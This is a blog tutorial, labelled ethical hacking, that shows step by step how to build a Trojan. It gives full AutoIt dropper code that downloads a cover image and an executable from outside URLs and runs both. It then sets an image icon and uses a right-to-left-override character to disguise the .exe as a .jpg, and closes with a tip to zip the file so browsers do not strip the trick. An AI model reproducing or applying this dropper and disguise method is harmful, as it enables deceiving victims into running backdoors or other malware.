preloader
Ethical hacking

How I created a Trojan Malware - Ethical Hacking

How I created a Trojan Malware - Ethical Hacking | By Gourav Dhar

newline

A Trojan horse (or Trojan) is one of the most common and dangerous types of threats that can infect your computer or mobile device.

What is trojan malware?

Trojan malware, when opened appears to be a legitimate file opened by the user like opening an image or a document or playing a media file, but in the background, it will run some evil process like someone may be gaining access to your computer through a backdoor or injecting some other harmful code.

Creating my trojan malware

In this blog, I will show you how I combined my executable file with an image file, and when opened, it was able to display the image when a target person opened it, but at the same time, the executable ran in the background. In simple words, I hid my .exe file in a .jpg image file.

This method can be extended to any file type like image, pdf, music, and so on. The executable in most cases is a virus or a backdoor used to gain access to the target computer. Let’s look at the steps: newline

newline a gif

1. Get a direct URL for the image and the .exe file

The .exe the executable file needs to be present on a publicly available URL from where it is directly downloaded by the browser. I have uploaded the executable on dropbox for this purpose. In the case of dropbox, modifying the end part of the sharable link to dl=1 will allow the browser to directly download the file. The link I have shared below does not contain any code and is actually an empty file, so it is safe for you to test the behavior of this link.

URL for the .exe executable:

https://www.dropbox.com/s/hsnvw0ik1em0637/some_evil_file.exe?dl=1

newline

URL for my image:

https://images.adsttc.com/media/images/5b04/5e3a/f197/cc1f/9600/00aa/newsletter/park_garden_concourse.jpg

newline

newline Image of a sports complex

I have used the image of the sports complex as a cover.

2. Using the URLs in a script

newline

#include <StaticConstants.au3>
#include <WindowsConstants.au3>
Local $urls = "url1,url2"
Local $urlsArray = StringSplit($urls, ",", 2 )
For $url In $urlsArray
 $sFile = _DownloadFile($url)
 shellExecute($sFile)
Next
Func _DownloadFile($sURL)
    Local $hDownload, $sFile
    $sFile = StringRegExpReplace($sURL, "^.*/", "")
    $sDirectory = @TempDir & $sFile
    $hDownload = InetGet($sURL, $sDirectory, 17, 1)
    InetClose($hDownload)
    Return $sDirectory
EndFunc   ;==>_GetURLImage

In the above code, in line number 3, replace url1 with the URL of the image and url2 with the URL of the executable file. My final code looks like this

newline

#include <StaticConstants.au3>
#include <WindowsConstants.au3>
Local $urls = "https://images.adsttc.com/media/images/5b04/5e3a/f197/cc1f/9600/00aa/newsletter/park_garden_concourse.jpg,https://www.dropbox.com/s/hsnvw0ik1em0637/some_evil_file.exe?dl=1"
Local $urlsArray = StringSplit($urls, ",", 2 )
For $url In $urlsArray
 $sFile = _DownloadFile($url)
 shellExecute($sFile)
Next
Func _DownloadFile($sURL)
    Local $hDownload, $sFile
    $sFile = StringRegExpReplace($sURL, "^.*/", "")
    $sDirectory = @TempDir & $sFile
    $hDownload = InetGet($sURL, $sDirectory, 17, 1)
    InetClose($hDownload)
    Return $sDirectory
EndFunc   ;==>_GetURLImage

Save the file with an extension .au3 . I have named the file trojan .au3 .

3. Creating an icon for the file

Since I am using an image as a cover file, Windows usually shows the thumbnail of the image as a file icon, so I will use the sports complex image as an icon and convert it to .ico format. You can google for it and you will find a number of tools to do it. I used this website for it - https://cloudconvert.com/jpg-to-ico

4. Compiling the script

The script is written in a scripting language called AutoIt. To install AutoIt in Ubuntu, you can install wine and install AutoIt , or if you want a straightforward way, install Veil from the steps mentioned here https://www.javatpoint.com/installing-veil. AutoIt will be installed in one of the steps after which you can exit the installation. 

Open the Compile AutoIt app. The window should look something like the box shown below. Enter the location of the trojan.au3 file and the path of the .ico file.

newline AutoIt dialog box

newline

The converted file looks like this on a windows machine.

newline Windows dialog box

Well, something’s not right. The problem with this file is its extension. It is obvious that is an executable since its extension is .exe . We need to spoof this extension.

5. Spoofing ‘.exe’ extension to any extension

To spoof the obvious extension .exe and replace it with .jpeg , we will use a right-to-left-override character.

To know about the detail of how spoofing actually works and where to place the right-to-left-override character, read the blog. Spoofing File Extensions

To summarise the steps mentioned in the above blog:

  • Rename trojan.exe to trojangpj.exe . 
  • Paste the right-to-left-override character at the 7th position after trojan. All the characters after the right-to-left-override the character will be flipped i.e read right to left. newline

newline Where to place the override character

newline

The filename now looks like trojanexe.jpg

newline Windows dialog box

newline

Since the image contained in the file is of a sports complex I will replace trojan in the name with sportscompl_ so that the file name reads sports_complexe.jpg .

newline Converted file image

newline

Congrats!!! Your trojan is ready. 

Now the filename matches with the image contained. Some recent browsers remove the right-to-left-override before downloading. So it is a good idea to zip the file and send it over.